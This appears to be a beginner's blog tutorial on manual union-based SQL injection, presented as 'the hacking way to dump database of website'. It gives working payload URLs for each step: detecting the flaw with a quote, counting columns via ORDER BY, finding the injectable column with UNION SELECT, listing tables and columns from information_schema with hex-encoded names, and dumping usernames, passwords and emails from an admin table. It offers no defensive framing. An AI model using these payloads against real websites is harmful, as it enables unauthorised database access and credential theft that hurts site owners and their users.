SQLi is the hacking way to dump database of website.
It is old trick, even though now too many websites are vulnerable to SQLi.
TUTORIAL FOR BEGINNERS
Finding vulnerability:
I got a link with URL http://www.ajithkp560.com/index.php?id=10
Now add a " ' " at the end of URL. That is http://www.ajithkp560.com/index.php?id=10'
If you get error message the website is vulnerable to SQLi
Finding total columns number
Finding columns by "order by"function
http://www.ajithkp560.com/index.php?id=10+order+by+1-- --> No error
http://www.ajithkp560.com/index.php?id=10+order+by+2-- --> No error
http://www.ajithkp560.com/index.php?id=10+order+by+3-- --> No error
...
...
...
http://www.ajithkp560.com/index.php?id=10+order+by+10-- --> Error
From the error we can understand there are 9 columns.
Finding vulnerable column
Vulnerable column can be find out by union+select+1,2,3,...,TotalNumberOfColumns--
ie, http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,3,4,5,6,7,8,9--
**id=-10 is used for find the vulnerable column.
we can find SQL version by http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,@@version,4,5,6,7,8,9--
After find vulnerable column we want to grab all tables in DB[Data Base].
For this we can use the bellow fuction.
We can grab tables by bellow function,
http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,group_concat(table_name),4,5,6,7,8,9+from+information_schema.tables--
Next grab columns from table. We need to encode the table name to Hexa Decimal.
I'm going to encode table
usuarios_adm to hexa decimal.
Encode it from here
http://ajithkp560.hostei.com/online_tools/hexatool.php.
usuarios_adm=7573756172696f735f61646d
Now the URL becomes
http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,group_concat(column_name),4,5,6,7,8,9+from+information_schema.columns+where+table_name=0x7573756172696f735f61646d--
** 0xHexValue --> 0x is preprocessing command to understand it is an HexaDecimal encode.
Dumping Data from column
Dumping data from by,
http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,group_concat(column_name_1,0x3a, column_name_2,0x3a,....column_name_n,0x3b),4,5,6,7,8,9+from+table_name_xxx--
I have dumped the data here by,
http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,group_concat(user,0x3a,pass,0x3a,email,0x3b),4,5,6,7,8,9+from+usuarios_adm--
------------------------->>>>>>>>>>>>>Write Your Comments<<<<<<<<<<<<<<---------------------------